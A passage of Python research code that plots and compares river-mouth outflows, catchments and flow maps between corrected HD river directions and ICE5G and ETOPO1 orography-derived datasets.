data_outflow_field = iodriver.load_field(data_rmouth_outflows_filename,
file_type=iodriver.\
get_file_extension(data_rmouth_outflows_filename),
field_type='Generic', grid_type=grid_type,**grid_kwargs)
if flip_ref_field:
ref_outflow_field.flip_data_ud()
if rotate_ref_field:
ref_outflow_field.rotate_field_by_a_hundred_and_eighty_degrees()
if flip_data_field:
data_outflow_field.flip_data_ud()
if rotate_data_field:
data_outflow_field.rotate_field_by_a_hundred_and_eighty_degrees()
ref_catchment_field, ref_outflow_field, data_catchment_field, data_outflow_field =\
rc_pts.modify_catchments_and_outflows(ref_catchments=ref_catchment_field,
ref_outflows=ref_outflow_field,
ref_flowmap=ref_flowtocellfield,
ref_rdirs = rdirs_field,
data_catchments=data_catchment_field,
data_outflows=data_outflow_field,
catchment_and_outflows_modifications_list_filename=\
catchment_and_outflows_mods_list_filepath,
original_scale_catchment=\
data_catchment_field_original_scale,
original_scale_flowmap=\
data_original_scale_flowtocellfield,
catchment_grid_changed=catchment_grid_changed,
swap_ref_and_data_when_finding_labels=\
swap_ref_and_data_when_finding_labels,
original_scale_grid_type=\
data_original_scale_grid_type,
original_scale_grid_kwargs=\
data_original_scale_grid_kwargs,
grid_type=grid_type,**grid_kwargs)
if flip_data_field:
data_outflow_field.flip_data_ud()
if rotate_data_field:
data_outflow_field.rotate_field_by_a_hundred_and_eighty_degrees()
if flip_ref_field:
ref_outflow_field.flip_data_ud()
if rotate_ref_field:
ref_outflow_field.rotate_field_by_a_hundred_and_eighty_degrees()
reference_rmouth_outflows_filename=os.path.join(self.scratch_dir,
self.temp_label + os.path.\
basename(reference_rmouth_outflows_filename))
data_rmouth_outflows_filename=os.path.join(self.scratch_dir,
self.temp_label + os.path.\
basename(reference_rmouth_outflows_filename))
temp_file_list.append(reference_rmouth_outflows_filename)
temp_file_list.append(data_rmouth_outflows_filename)
iodriver.write_field(reference_rmouth_outflows_filename,
field=ref_outflow_field,
file_type=iodriver.\
get_file_extension(reference_rmouth_outflows_filename))
iodriver.write_field(data_rmouth_outflows_filename,
field=data_outflow_field,
file_type=iodriver.\
get_file_extension(data_rmouth_outflows_filename))
matchedpairs, unresolved_conflicts = mtch_rm.main(reference_rmouth_outflows_filename=\
reference_rmouth_outflows_filename,
data_rmouth_outflows_filename=\
data_rmouth_outflows_filename,
grid_type=grid_type,
flip_data_field=flip_data_field,
rotate_data_field=rotate_data_field,
flip_ref_field=flip_ref_field,
rotate_ref_field=rotate_ref_field,
param_set=matching_parameter_set,
**grid_kwargs)
if additional_matches_list_filename:
additional_matches = mtch_rm.load_additional_manual_matches(additional_matches_list_filepath,
reference_rmouth_outflows_filename,
data_rmouth_outflows_filename,
flip_data_field=flip_data_field,
rotate_data_field=rotate_data_field,
grid_type='HD',**grid_kwargs)
matchedpairs.extend(additional_matches)
if ref_orog_filename:
ref_orog_field[rdirs_field <= 0] = np.ma.masked
interactive_plots = Interactive_Plots()
if return_simple_catchment_and_flowmap_plotters and plot_simple_catchment_and_flowmap_plots:
simple_catchment_and_flowmap_plotters = []
if return_catchment_plotters:
catchment_plotters = []
for pair in matchedpairs:
if pair[0].get_lat() > 310:
continue
if select_only_rivers_in == "North America":
if(pair[0].get_lat() > 156 or pair[0].get_lon() > 260):
continue
print("Ref Point: " + str(pair[0]) + "Matches: " + str(pair[1]))
if rivers_to_plot is not None:
if not (pair[0].get_lat(),pair[0].get_lon()) in rivers_to_plot:
continue
if split_comparison_plots_across_multiple_canvases:
plt.figure(figsize=(25,6.25))
ax = plt.subplot(121)
plt.tight_layout()
else:
plt.figure(figsize=(25,12.5))
ax = plt.subplot(222)
rc_pts.plot_river_rmouth_flowmap(ax=ax,
ref_flowtocellfield=ref_flowtocellfield,
data_flowtocellfield=data_flowtocellfield,
rdirs_field=rdirs_field,
pair=pair,colors=self.colors)
if split_comparison_plots_across_multiple_canvases:
ax_hist = plt.subplot(122)
plt.figure(figsize=(12.5,12.5))
ax_catch = plt.subplot(111)
plt.tight_layout(rect=(0,0,0.9,1))
else:
ax_hist = plt.subplot(221)
ax_catch = plt.subplot(223)
plot_catchment_and_histogram_output = \
rc_pts.plot_catchment_and_histogram_for_river(ax_hist=ax_hist,ax_catch=ax_catch,
ref_catchment_field=ref_catchment_field,
data_catchment_field=data_catchment_field,
data_catchment_field_original_scale=\
data_catchment_field_original_scale,
data_original_scale_flowtocellfield=\
data_original_scale_flowtocellfield,
rdirs_field=rdirs_field,
data_rdirs_field=data_rdirs_field,pair=pair,
catchment_grid_changed=catchment_grid_changed,
swap_ref_and_data_when_finding_labels=\
swap_ref_and_data_when_finding_labels,
colors=self.colors,
ref_grid=ref_grid,
grid_type=grid_type,
alternative_catchment_bounds=\
alternative_catchment_bounds,
use_simplified_catchment_colorscheme=\
use_simplified_catchment_colorscheme,
use_upscaling_labels=\
use_upscaling_labels,
allow_new_sink_points=\
allow_new_true_sinks,
external_landsea_mask=\
external_ls_mask,
ref_original_scale_flowtocellfield=\
ref_original_scale_flowtocellfield,
ref_catchment_field_original_scale=\
ref_catchment_field_original_scale,
use_original_scale_field_for_determining_data_and_ref_labels=\
use_original_scale_field_for_determining_data_and_ref_labels,
return_catchment_plotter=\
return_catchment_plotters,
data_original_scale_grid_type=\
data_original_scale_grid_type,
ref_original_scale_grid_type=\
ref_original_scale_grid_type,
data_original_scale_grid_kwargs=\
data_original_scale_grid_kwargs,
ref_original_scale_grid_kwargs=\
ref_original_scale_grid_kwargs,
**grid_kwargs)
if return_catchment_plotters:
catchment_section,catchment_bounds,scale_factor,catchment_plotter =\
plot_catchment_and_histogram_output
catchment_plotters.append(catchment_plotter)
else:
catchment_section,catchment_bounds,scale_factor = plot_catchment_and_histogram_output
if split_comparison_plots_across_multiple_canvases:
plt.figure(figsize=(12.5,12.5))
ax = plt.subplot(111)
plt.tight_layout(rect=(0,0,0.9,1))
else:
ax = plt.subplot(224)
rc_pts.plot_whole_river_flowmap(ax=ax,pair=pair,ref_flowtocellfield=ref_flowtocellfield,
data_flowtocellfield=data_flowtocellfield,
rdirs_field=rdirs_field,data_rdirs_field=data_rdirs_field,
catchment_bounds=catchment_bounds,colors=self.colors,
simplified_flowmap_plot=use_simplified_flowmap_colorscheme,
allow_new_sink_points=allow_new_true_sinks)
if plot_simple_catchment_and_flowmap_plots:
simple_candf_plt = plt.figure(figsize=(10,6))
simple_ref_ax = plt.subplot(121)
simple_data_ax = plt.subplot(122)
flowtocell_threshold = 75
plotters = rc_pts.simple_catchment_and_flowmap_plots(fig=simple_candf_plt,
ref_ax=simple_ref_ax,
data_ax=simple_data_ax,
ref_catchment_field=ref_catchment_field,
data_catchment_field=data_catchment_field,
data_catchment_field_original_scale=\
data_catchment_field_original_scale,
ref_flowtocellfield=ref_flowtocellfield,
data_flowtocellfield=data_flowtocellfield,
data_original_scale_flowtocellfield=\
data_original_scale_flowtocellfield,
pair=pair,catchment_bounds=catchment_bounds,
flowtocell_threshold=flowtocell_threshold,
catchment_grid_changed=catchment_grid_changed,
colors=self.colors,
external_ls_mask=external_ls_mask,
grid_type=grid_type,
data_original_scale_grid_type=\
data_original_scale_grid_type,
data_original_scale_grid_kwargs=\
data_original_scale_grid_kwargs,**grid_kwargs)
if return_simple_catchment_and_flowmap_plotters:
simple_catchment_and_flowmap_plotters.append(plotters)
if ref_orog_filename and data_orog_original_scale_filename:
if super_fine_orog_filename:
data_to_super_fine_scale_factor = \
pts.calculate_scale_factor(course_grid_type=data_original_scale_grid_type,
course_grid_kwargs=data_original_scale_grid_kwargs,
fine_grid_type=super_fine_orog_grid_type,
fine_grid_kwargs=super_fine_orog_grid_kwargs)
ref_to_super_fine_scale_factor = data_to_super_fine_scale_factor*scale_factor
else:
ref_to_super_fine_scale_factor=None
interactive_plots.setup_plots(catchment_section,
ref_orog_field,
data_orog_original_scale_field,
ref_flowtocellfield,
data_flowtocellfield,
rdirs_field,
super_fine_orog_field,
super_fine_data_flowmap,
pair, catchment_bounds,
scale_factor,
ref_to_super_fine_scale_factor,
ref_grid_offset_adjustment=ref_grid.\
get_longitude_offset_adjustment(),
fine_grid_offset_adjustment=fine_grid.\
get_longitude_offset_adjustment(),
super_fine_grid_offset_adjustment=super_fine_grid.\
get_longitude_offset_adjustment())
elif ref_orog_filename or data_orog_original_scale_filename:
raise UserWarning("No orography plot generated, require both a reference orography"
" and a data orography to generate an orography plot")
print("Unresolved Conflicts: ")
for conflict in unresolved_conflicts:
print(" Conflict:")
for pair in conflict:
print(" Ref Point" + str(pair[0]) + "Matches" + str(pair[1]))
for temp_file in temp_file_list:
if os.path.basename(temp_file).startswith("temp_"):
print("Deleting File: {0}".format(temp_file))
os.remove(temp_file)
if return_simple_catchment_and_flowmap_plotters and plot_simple_catchment_and_flowmap_plots:
return simple_catchment_and_flowmap_plotters
if return_catchment_plotters:
return catchment_plotters
def Compare_Corrected_HD_Rdirs_And_ICE5G_as_HD_data_ALG4_sinkless_all_points_0k(self):
corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_corrected_HD_rdirs_post_processing_20160427_141158.nc")
ice5g_as_HD_data_ALG4_sinkless_all_points_0k = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_ICE5G_as_HD_data_ALG4_sinkless_all_points_0k_20160427_134237.nc")
self.OutFlowComparisonPlotHelpers(corrected_hd_rdirs_rmouthoutflow_file,
ice5g_as_HD_data_ALG4_sinkless_all_points_0k,
"flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
"flowmap_ICE5G_as_HD_data_ALG4_sinkless_all_points_0k_20160427_134237.nc",
"rivdir_vs_1_9_data_from_stefan.nc",
grid_type='HD')
def Compare_Corrected_HD_Rdirs_And_ICE5G_as_HD_data_ALG4_true_sinks_all_points_0k(self):
corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_corrected_HD_rdirs_post_processing_20160427_141158.nc")
ice5g_as_HD_data_ALG4_sinkless_all_points_0k = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_ICE5G_as_HD_data_ALG4_sinkless_all_points_0k_20160608_184931.nc")
self.OutFlowComparisonPlotHelpers(corrected_hd_rdirs_rmouthoutflow_file,
ice5g_as_HD_data_ALG4_sinkless_all_points_0k,
"flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
"flowmap_ICE5G_as_HD_data_ALG4_sinkless_all_points_0k_20160608_184931.nc",
"rivdir_vs_1_9_data_from_stefan.nc",
ref_catchment_filename=\
"catchmentmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
data_catchment_filename=\
"catchmentmap_ICE5G_as_HD_data_ALG4_sinkless_all_points_0k_20160608_184931.nc",
grid_type='HD')
def Compare_Corrected_HD_Rdirs_And_ICE5G_ALG4_sinkless_all_points_0k_directly_upscaled_fields(self):
corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_corrected_HD_rdirs_post_processing_20160427_141158.nc")
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field = os.path.join(self.rmouth_outflow_data_directory,
"upscaled/rmouthflows_ICE5G_data_ALG4_sinkless_0k_upscale_riverflows_and_river_mouth_flows_20160502_163323.nc")
self.OutFlowComparisonPlotHelpers(corrected_hd_rdirs_rmouthoutflow_file,
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field,
"flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
"upscaled/flowmap_ICE5G_data_ALG4_sinkless_0k_upscale_riverflows"
"_and_river_mouth_flows_20160502_163323.nc",
"rivdir_vs_1_9_data_from_stefan.nc",
flip_data_field=True,
rotate_data_field=True,
super_fine_orog_filename="ETOPO1_Ice_c_gmt4.nc",
flip_super_fine_orog=True,
rotate_super_fine_orog=False,
super_fine_orog_grid_type='LatLong1min',
grid_type='HD')
def Compare_Corrected_HD_Rdirs_And_ICE5G_ALG4_true_sinks_all_points_0k_directly_upscaled_fields(self):
corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_corrected_HD_rdirs_post_processing_20160427_141158.nc")
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field = os.path.join(self.rmouth_outflow_data_directory,
"upscaled/rmouthflows__ICE5G_data_ALG4_sinkless_0k_upscale_riverflows_and_river_mouth_flows_20160603_112520.nc")
self.OutFlowComparisonPlotHelpers(corrected_hd_rdirs_rmouthoutflow_file,
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field,
"flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
"upscaled/flowmap__ICE5G_data_ALG4_sinkless_0k_upscale_riverflows"
"_and_river_mouth_flows_20160603_112520.nc",
"rivdir_vs_1_9_data_from_stefan.nc",
flip_data_field=True,
rotate_data_field=True,
data_rdirs_filename="generated/"
"updated_RFDs_ICE5G_data_ALG4_sinkless_0k_20160603_112512.nc",
ref_catchment_filename=\
"catchmentmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
data_catchment_filename=\
"upscaled/catchmentmap_unsorted__ICE5G_data_ALG4_sinkless_0k_upscale_riverflows"
"_and_river_mouth_flows_20160704_152025.nc",
data_catchment_original_scale_filename=\
"catchmentmap_unsorted_ICE5G_data_ALG4_sinkless_0k_20160603_112512.nc",
data_original_scale_flow_map_filename=\
"flowmap_ICE5G_data_ALG4_sinkless_0k_20160603_112512.nc",
ref_orog_filename="topo_hd_vs1_9_data_from_stefan.nc",
data_orog_original_scale_filename=
"ice5g_v1_2_00_0k_10min.nc",
additional_matches_list_filename=\
'additional_matches_ice5g_10min.txt',
super_fine_orog_filename="ETOPO1_Ice_c_gmt4.nc",
flip_super_fine_orog=True,
rotate_super_fine_orog=False,
super_fine_orog_grid_type='LatLong1min',
grid_type='HD',data_original_scale_grid_type='LatLong10min')
def Compare_Corrected_HD_Rdirs_And_ICE5G_ALG4_corr_orog_all_points_0k_directly_upscaled_fields(self):
data_creation_datetime="20160802_112138"
corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_corrected_HD_rdirs_post_processing_20160427_141158.nc")
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field = os.path.join(self.rmouth_outflow_data_directory,
"upscaled/rmouthflows_ICE5G_data_ALG4_sinkless_0k_{0}.nc".format(data_creation_datetime))
self.OutFlowComparisonPlotHelpers(corrected_hd_rdirs_rmouthoutflow_file,
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field,
"flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
"upscaled/flowmap_ICE5G_data_ALG4_sinkless_0k_{0}.nc".\
format(data_creation_datetime),
"rivdir_vs_1_9_data_from_stefan.nc",
flip_data_field=True,
rotate_data_field=True,
data_rdirs_filename="generated/"
"updated_RFDs_ICE5G_data_ALG4_sinkless_0k_{0}.nc".\
format(data_creation_datetime),
ref_catchment_filename=\
"catchmentmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
data_catchment_filename=\
"upscaled/catchmentmap_unsorted_ICE5G_data_ALG4_sinkless_0k_{0}.nc".\
format(data_creation_datetime),
data_catchment_original_scale_filename=\
"catchmentmap_unsorted_ICE5G_data_ALG4_sinkless_0k_{0}.nc".\
format(data_creation_datetime),
data_original_scale_flow_map_filename=\
"flowmap_ICE5G_data_ALG4_sinkless_0k_{0}.nc".\
format(data_creation_datetime),
ref_orog_filename="topo_hd_vs1_9_data_from_stefan.nc",
data_orog_original_scale_filename=
"generated/corrected/"
"corrected_orog_ICE5G_data_ALG4_sinkless_0k_{0}.nc".\
format(data_creation_datetime),
additional_matches_list_filename=\
'additional_matches_ice5g_10min.txt',
super_fine_orog_filename="ETOPO1_Ice_c_gmt4.nc",
super_fine_data_flowmap_filename=
"flowmap_etopo1_data_ALG4_sinkless_20160603_112520.nc",
flip_super_fine_orog=True,
rotate_super_fine_orog=False,
super_fine_orog_grid_type='LatLong1min',
grid_type='HD',data_original_scale_grid_type='LatLong10min')
def Compare_Corrected_HD_Rdirs_And_ICE5G_ALG4_corr_orog_downscaled_ls_mask_all_points_0k_directly_upscaled_fields(self):
#data_creation_datetime="20160930_001057" #original rdirs from the original complete corrected orography
data_creation_datetime="20170514_104220" #Version with Amu Darya added
corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_corrected_HD_rdirs_post_processing_20160427_141158.nc")
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field = os.path.join(self.rmouth_outflow_data_directory,
"upscaled/rmouthflows_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".format(data_creation_datetime))
self.OutFlowComparisonPlotHelpers(corrected_hd_rdirs_rmouthoutflow_file,
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field,
"flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
"upscaled/flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime),
"rivdir_vs_1_9_data_from_stefan.nc",
#It is no longer required to flip data when using 2017 or later data files
flip_data_field=False,
rotate_data_field=True,
data_rdirs_filename="generated/"
"updated_RFDs_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime),
ref_catchment_filename=\
"catchmentmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
data_catchment_filename=\
"upscaled/catchmentmap_unsorted_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime),
data_catchment_original_scale_filename=\
"catchmentmap_unsorted_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime),
data_original_scale_flow_map_filename=\
"flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime),
ref_orog_filename="topo_hd_vs1_9_data_from_stefan.nc",
data_orog_original_scale_filename=
"generated/corrected/"
"corrected_orog_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime),
additional_matches_list_filename=\
'additional_matches_ice5g_10min.txt',
catchment_and_outflows_mods_list_filename='catch_and_outflow_mods_ice5g_10min.txt',
super_fine_orog_filename="ETOPO1_Ice_c_gmt4.nc",
super_fine_data_flowmap_filename=
"flowmap_etopo1_data_ALG4_sinkless_20160603_112520.nc",
flip_super_fine_orog=True,
rotate_super_fine_orog=False,
super_fine_orog_grid_type='LatLong1min',
grid_type='HD',data_original_scale_grid_type='LatLong10min')
def Compare_ICE5G_with_and_without_tarasov_upscaled_srtm30_ALG4_corr_orog_0k_directly_upscaled_fields(self):
data_creation_datetime_with_tarasov="20170511_121440"
data_creation_datetime_ICE5G_alone="20170505_144847"
data_creation_datetime_ICE5G_alone_upscaled="20170507_135726"
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field_without_tarasov_ups_data =\
os.path.join(self.rmouth_outflow_data_directory,
"upscaled/rmouthflows_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".format(data_creation_datetime_ICE5G_alone))
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field_with_tarasov_ups_data = \
os.path.join(self.rmouth_outflow_data_directory,
"upscaled/rmouthflows_ICE5G_and_tarasov_upscaled_srtm30plus_data_ALG4_sinkless_"
"downscaled_ls_mask_0k_{0}.nc".format(data_creation_datetime_with_tarasov))
self.OutFlowComparisonPlotHelpers(ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field_without_tarasov_ups_data,
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field_with_tarasov_ups_data,
"upscaled/flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime_ICE5G_alone),
"upscaled/flowmap_ICE5G_and_tarasov_upscaled_srtm30plus_data_"
"ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime_with_tarasov),
"generated/upscaled/upscaled_rdirs_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k"
"_upscale_rdirs_{0}_updated.nc".\
format(data_creation_datetime_ICE5G_alone_upscaled),
flip_data_field=False,rotate_data_field=True,
flip_ref_field=False,rotate_ref_field=True,
data_rdirs_filename="generated/"
"updated_RFDs_ICE5G_and_tarasov_upscaled_srtm30plus_data"
"_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime_with_tarasov),
ref_catchment_filename=\
"upscaled/catchmentmap_unsorted_ICE5G_data_ALG4"
"_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime_ICE5G_alone),
data_catchment_filename=\
"upscaled/catchmentmap_unsorted_ICE5G_and_tarasov_upscaled_srtm30plus_"
"data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime_with_tarasov),
data_catchment_original_scale_filename=\
"catchmentmap_unsorted_ICE5G_and_tarasov_upscaled_srtm30plus_data_"
"ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime_with_tarasov),
data_original_scale_flow_map_filename=\
"flowmap_ICE5G_and_tarasov_upscaled_srtm30plus_data_ALG4_sinkless"
"_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime_with_tarasov),
flip_orog_original_scale_relative_to_data=True,
ref_orog_filename="topo_hd_vs1_9_data_from_stefan.nc",
data_orog_original_scale_filename=
"generated/corrected/"
"corrected_orog_ICE5G_and_tarasov_upscaled_srtm30plus_data_ALG4_sinkless_"
"downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime_with_tarasov),
super_fine_orog_filename="ETOPO1_Ice_c_gmt4.nc",
super_fine_data_flowmap_filename=
"flowmap_etopo1_data_ALG4_sinkless_20160603_112520.nc",
flip_super_fine_orog=True,
rotate_super_fine_orog=False,
select_only_rivers_in="North America",
allow_new_true_sinks=True,
use_original_scale_field_for_determining_data_and_ref_labels=True,
ref_original_scale_flow_map_filename="flowmap_ICE5G_data_ALG4_sinkless_"
"downscaled_ls_mask_0k_{0}.nc".format(data_creation_datetime_ICE5G_alone),
ref_catchment_original_scale_filename=
"catchmentmap_unsorted_ICE5G_data_ALG4_"
"sinkless_downscaled_ls_mask_0k_{0}.nc".format(data_creation_datetime_ICE5G_alone),
matching_parameter_set='magnitude_extensive',
super_fine_orog_grid_type='LatLong1min',
grid_type='HD',data_original_scale_grid_type='LatLong10min',
ref_original_scale_grid_type='LatLong10min')
def Compare_Corrected_HD_Rdirs_And_ICE5G_plus_tarasov_upscaled_srtm30_ALG4_corr_orog_0k_directly_upscaled_fields(self):
data_creation_datetime="20170506_105104"
corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_corrected_HD_rdirs_post_processing_20160427_141158.nc")
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field = os.path.join(self.rmouth_outflow_data_directory,
"upscaled/rmouthflows_ICE5G_and_tarasov_upscaled_srtm30plus_data_ALG4_sinkless_"
"downscaled_ls_mask_0k_{0}.nc".format(data_creation_datetime))
self.OutFlowComparisonPlotHelpers(corrected_hd_rdirs_rmouthoutflow_file,
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field,
"flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
"upscaled/flowmap_ICE5G_and_tarasov_upscaled_srtm30plus_data_"
"ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime),
"rivdir_vs_1_9_data_from_stefan.nc",
flip_data_field=False,
rotate_data_field=True,
data_rdirs_filename="generated/"
"updated_RFDs_ICE5G_and_tarasov_upscaled_srtm30plus_data"
"_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime),
ref_catchment_filename=\
"catchmentmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
data_catchment_filename=\
"upscaled/catchmentmap_unsorted_ICE5G_and_tarasov_upscaled_srtm30plus_"
"data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime),
data_catchment_original_scale_filename=\
"catchmentmap_unsorted_ICE5G_and_tarasov_upscaled_srtm30plus_data_"
"ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime),
data_original_scale_flow_map_filename=\
"flowmap_ICE5G_and_tarasov_upscaled_srtm30plus_data_ALG4_sinkless"
"_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime),
flip_orog_original_scale_relative_to_data=True,
ref_orog_filename="topo_hd_vs1_9_data_from_stefan.nc",
data_orog_original_scale_filename=
"generated/corrected/"
"corrected_orog_ICE5G_and_tarasov_upscaled_srtm30plus_data_ALG4_sinkless_"
"downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime),
additional_matches_list_filename=\
'additional_matches_ice5g_10min.txt',
catchment_and_outflows_mods_list_filename='catch_and_outflow_mods_ice5g_10min.txt',
super_fine_orog_filename="ETOPO1_Ice_c_gmt4.nc",
super_fine_data_flowmap_filename=
"flowmap_etopo1_data_ALG4_sinkless_20160603_112520.nc",
flip_super_fine_orog=True,
rotate_super_fine_orog=False,
select_only_rivers_in="North America",
super_fine_orog_grid_type='LatLong1min',
grid_type='HD',data_original_scale_grid_type='LatLong10min')
def Compare_Corrected_HD_Rdirs_And_Etopo1_ALG4_sinkless_directly_upscaled_fields(self):
corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_corrected_HD_rdirs_post_processing_20160427_141158.nc")
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field = os.path.join(self.rmouth_outflow_data_directory,
"upscaled/rmouthflows_etopo1_data_ALG4_sinkless_upscale_riverflows_and_river_mouth_flows_20160503_231022.nc")
self.OutFlowComparisonPlotHelpers(corrected_hd_rdirs_rmouthoutflow_file,
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field,
"flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
"upscaled/flowmap_etopo1_data_ALG4_sinkless_upscale_riverflows_"
"and_river_mouth_flows_20160503_231022.nc",
"rivdir_vs_1_9_data_from_stefan.nc",
flip_data_field=True,
grid_type='HD')
def Compare_Corrected_HD_Rdirs_And_Etopo1_ALG4_true_sinks_directly_upscaled_fields(self):
corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_corrected_HD_rdirs_post_processing_20160427_141158.nc")
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field = os.path.join(self.rmouth_outflow_data_directory,
"upscaled/rmouthflows__etopo1_data_ALG4_sinkless_upscale_riverflows_and_river_mouth_flows_20160603_114215.nc")
self.OutFlowComparisonPlotHelpers(corrected_hd_rdirs_rmouthoutflow_file,
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field,
"flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
"upscaled/flowmap__etopo1_data_ALG4_sinkless_upscale_riverflows_"
"and_river_mouth_flows_20160603_114215.nc",
"rivdir_vs_1_9_data_from_stefan.nc",
flip_data_field=True,
ref_catchment_filename=\
"catchmentmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
data_catchment_filename=\
"catchmentmap_unsorted_etopo1_data_ALG4_sinkless_20160603_112520.nc",
data_original_scale_flow_map_filename=\
"flowmap_etopo1_data_ALG4_sinkless_20160603_112520.nc",
grid_type='HD',data_original_scale_grid_type='LatLong1min')
def Compare_Upscaled_Rdirs_vs_Directly_Upscaled_fields_ICE5G_data_ALG4_corr_orog_downscaled_ls_mask_0k(self):
data_creation_datetime_directly_upscaled="20160930_001057"
data_creation_datetime_rdirs_upscaled = "20161031_113238"
ice5g_ALG4_sinkless_all_points_0k_river_flow_dir_upsc_field = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale_rdirs_{0}_updated.nc"\
.format(data_creation_datetime_rdirs_upscaled))
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field = os.path.join(self.rmouth_outflow_data_directory,
"upscaled/rmouthflows_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc"\
.format(data_creation_datetime_directly_upscaled))
self.OutFlowComparisonPlotHelpers(ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field,
ice5g_ALG4_sinkless_all_points_0k_river_flow_dir_upsc_field,
"upscaled/flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime_directly_upscaled),
"flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale_rdirs_{0}_updated.nc".\
format(data_creation_datetime_rdirs_upscaled),
"generated/upscaled/"
"upscaled_rdirs_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale_rdirs_{0}_updated.nc".\
format(data_creation_datetime_rdirs_upscaled),
flip_ref_field=True,
rotate_ref_field=True,
flip_data_field=True,
rotate_data_field=True,
ref_orog_filename=\
"topo_hd_vs1_9_data_from_stefan.nc",
data_orog_original_scale_filename=\
"generated/corrected/"
"corrected_orog_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".format(data_creation_datetime_directly_upscaled),
data_catchment_filename=\
"catchmentmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale_rdirs_{0}_updated.nc".\
format(data_creation_datetime_rdirs_upscaled),
ref_catchment_filename=
"upscaled/catchmentmap_unsorted_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime_directly_upscaled),
data_catchment_original_scale_filename=\
